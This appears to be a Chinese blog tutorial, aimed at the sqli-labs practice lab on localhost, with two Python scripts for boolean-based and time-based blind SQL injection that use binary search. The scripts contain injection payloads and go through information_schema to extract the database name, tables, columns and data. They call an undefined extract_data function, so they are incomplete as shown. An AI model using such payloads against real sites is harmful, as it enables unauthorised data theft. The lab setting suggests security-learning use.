利用二分法+布尔盲注、时间盲注进行sql注入

Ajiang4212025-02-14 21:11

一、布尔盲注:

python 复制代码 
import requests
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
 
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
    print(f"数据库名: {database_name}")
    print(f"表名: {table_names}")
    print(f"列名: {column_names}")
    print(f"数据: {extracted_values}")

二、时间盲注:

python 复制代码 
import requests
import time
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        
        if response_time > 1.5:  # 服务器延迟意味着条件成立
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
相关推荐
神奇侠20243 小时前
Hive SQL常见操作
hive·hadoop·sql
一只叫煤球的猫3 小时前
MySQL 8.0 SQL优化黑科技,面试官都不一定知道!
后端·sql·mysql
多多*4 小时前
微服务网关SpringCloudGateway+SaToken鉴权
linux·开发语言·redis·python·sql·log4j·bootstrap
deriva4 小时前
某水表量每15分钟一报,然后某天示数清0了,重新报示值了 ,如何写sql 计算每日水量
数据库·sql
云之兕6 小时前
MyBatis 的动态 SQL
数据库·sql·mybatis
圈圈编码10 小时前
悲观锁和乐观锁
java·开发语言·sql·mysql
qq_4084133913 小时前
spark 执行 hive sql数据丢失
hive·sql·spark
漫谈网络14 小时前
sqlite3 命令行工具详细介绍
sql·sqlite·db
emo了小猫21 小时前
Mybatis #{} 和 ${}区别,使用场景,LIKE模糊查询避免SQL注入
数据库·sql·mysql·mybatis
青春之我_XP1 天前
【基于阿里云搭建数据仓库(离线)】Data Studio创建资源与函数
大数据·数据仓库·sql·dataworks·maxcompute·data studio
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02KGG转MP3工具|非KGM文件|解密音频03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【无人机】无人机通信模块,无人机图数传模块的介绍,数传,图传,图传数传一体电台,05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06DeepSeek各版本说明与优缺点分析07神经网络架构KAN确实具有一些独特的特点及底层原理和应用场景08VMware虚拟机安装Win7专业版保姆级教程(附镜像包)09组基轨迹建模 GBTM的介绍与实现(Stata 或 R)10柬埔寨语翻译通App,一款真正实现高棉语翻译、语音识别和中柬双语无障碍交流的应用程序。